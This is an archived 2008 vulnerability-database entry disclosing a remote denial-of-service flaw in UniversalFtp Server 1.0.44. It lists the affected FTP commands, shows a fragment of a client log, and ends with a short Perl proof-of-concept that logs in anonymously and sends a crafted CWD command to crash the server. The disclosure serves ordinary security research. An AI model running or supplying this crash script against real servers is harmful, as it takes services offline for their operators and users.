Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19145
HistoryFeb 16, 2008 - 12:00 a.m.

UniversalFtp Server 1.0.44 Multiple Remote Denial of service

2008-02-1600:00:00
vulners.com
57

UniversalFtp Server 1.0.44 Multiple Remote #Denial of service

#@nolife : This bug has been found with a brain , ten fingers, a keyboard , and a laptop , one of my best Tool i ever tryed. Stay tuned for more tools hint .

Reponse: 226 Completed…

Statut: Liste du repertoire completee

Commande : LIST aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa… … …

Reponse: 150 Directory…

Statut: ftpcontrolsocket.cpp(1764): Waiting for replies to skip before sending next command… caller=0p12e69f8 –> 0_o

#functions vuln : CWD (2 A) , LIST ( 4102 A) ,PORT (2 A)

PoC :

use Net::FTP;
(($target = $ARGV[0])) || die "usage:$0 <target> <port>";
my $user = "anonymous";
my $pass = "something";
print "Trying to connect to :$target…\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect";
print "Connected!\n";
$ftp->login($user, $pass);
$ftp->cwd("AA");
print "Poc Successfull the server should down now \n";
$ftp->quit;